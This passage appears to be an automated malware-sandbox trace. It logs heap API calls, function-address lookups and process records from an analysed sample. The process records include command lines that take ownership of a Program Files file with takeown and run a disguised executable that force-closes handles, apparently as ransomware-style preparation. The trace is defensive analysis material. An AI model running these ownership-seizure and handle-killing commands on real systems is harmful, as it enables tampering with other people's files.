[0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4c08 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bf0) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4bf0) returned 0x10 [0224.030] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bf0 | out: hHeap=0x5e0000) returned 1 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] GetProcessHeap () returned 0x5e0000 [0224.030] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5008) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5008) returned 0x14 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5008 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5228) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5228) returned 0x16 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5228 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bc0) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4bc0) returned 0x10 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4bc0 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4fd0) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4fd0) returned 0x14 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4fd0 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ea0) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ea0) returned 0x2 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ea0 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4eb0) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.031] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4eb0) returned 0x14 [0224.031] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4eb0 | out: hHeap=0x5e0000) returned 1 [0224.031] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ed0) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ed0) returned 0x14 [0224.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ed0 | out: hHeap=0x5e0000) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ef0) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ef0) returned 0x14 [0224.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ef0 | out: hHeap=0x5e0000) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f10) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4f10) returned 0x14 [0224.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f10 | out: hHeap=0x5e0000) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51a8) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f51a8) returned 0x14 [0224.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51a8 | out: hHeap=0x5e0000) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51c8) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f51c8) returned 0x14 [0224.032] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51c8 | out: hHeap=0x5e0000) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6810) returned 1 [0224.032] GetProcessHeap () returned 0x5e0000 [0224.032] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f6810) returned 0x30 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6810 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51e8) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f51e8) returned 0x14 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f51e8 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6848) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f6848) returned 0x30 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f6848 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5248) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5248) returned 0x14 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5248 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d98) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x606d98) returned 0x68 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606d98 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5608) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5608) returned 0x14 [0224.033] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5608 | out: hHeap=0x5e0000) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.033] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ae8) returned 1 [0224.033] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ae8) returned 0x10 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ae8 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f30) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4f30) returned 0x14 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f30 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f50) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4f50) returned 0x14 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f50 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f70) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4f70) returned 0x14 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f70 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f90) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4f90) returned 0x14 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4f90 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b00) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4b00) returned 0x10 [0224.034] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b00 | out: hHeap=0x5e0000) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.034] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4fb0) returned 1 [0224.034] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4fb0) returned 0x14 [0224.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4fb0 | out: hHeap=0x5e0000) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5028) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5028) returned 0x14 [0224.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5028 | out: hHeap=0x5e0000) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5068) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5068) returned 0x14 [0224.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5068 | out: hHeap=0x5e0000) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50a8) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f50a8) returned 0x14 [0224.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50a8 | out: hHeap=0x5e0000) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50c8) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f50c8) returned 0x14 [0224.035] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f50c8 | out: hHeap=0x5e0000) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5128) returned 1 [0224.035] GetProcessHeap () returned 0x5e0000 [0224.035] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5128) returned 0x14 [0224.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5128 | out: hHeap=0x5e0000) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5148) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5148) returned 0x14 [0224.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5148 | out: hHeap=0x5e0000) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5168) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5168) returned 0x14 [0224.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5168 | out: hHeap=0x5e0000) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b18) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4b18) returned 0x10 [0224.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4b18 | out: hHeap=0x5e0000) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5048) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f5048) returned 0x14 [0224.036] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f5048 | out: hHeap=0x5e0000) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] HeapValidate (hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ad0) returned 1 [0224.036] GetProcessHeap () returned 0x5e0000 [0224.036] RtlSizeHeap (HeapHandle=0x5e0000, Flags=0x0, MemoryPointer=0x5f4ad0) returned 0x10 [0224.037] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f4ad0 | out: hHeap=0x5e0000) returned 1 [0224.037] exit (_Code=0) Thread: id = 813 os_tid = 0x78c Process: id = "219" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x1c537000" os_pid = "0x93c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 791 os_tid = 0x92c Thread: id = 796 os_tid = 0x82c Thread: id = 811 os_tid = 0xaf4 Process: id = "220" image_name = "takeown.exe" filename = "c:\\windows\\syswow64\\takeown.exe" page_root = "0x1c46e000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "186" os_parent_pid = "0xaec" cmd_line = "takeown /F \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 793 os_tid = 0x7b0 Thread: id = 808 os_tid = 0x30c Process: id = "221" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x1cb90000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "213" os_parent_pid = "0xac8" cmd_line = "tdq963ii.exe -accepteula \"component.exe\" -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 795 os_tid = 0x8cc Process: id = "222" image_name = "tdq963ii.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe" page_root = "0x28de3000" os_pid = "0x38c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "12" os_parent_pid = "0x1c4" cmd_line = "tdq963ii.exe -accepteula -c 158 -y -p 2880 -nobanner" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 806 os_tid = 0xac4 [0220.510] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="DeviceIoControl") returned 0x76d4322f [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0220.510] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0220.511] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0220.512] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0220.513] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0220.514] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0220.514] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0220.514] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0220.514] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0220.514] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0220.515] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0220.516] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0220.517] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0220.518] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0220.519] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0220.519] GetProcAddress (hModule=0x76d30000, 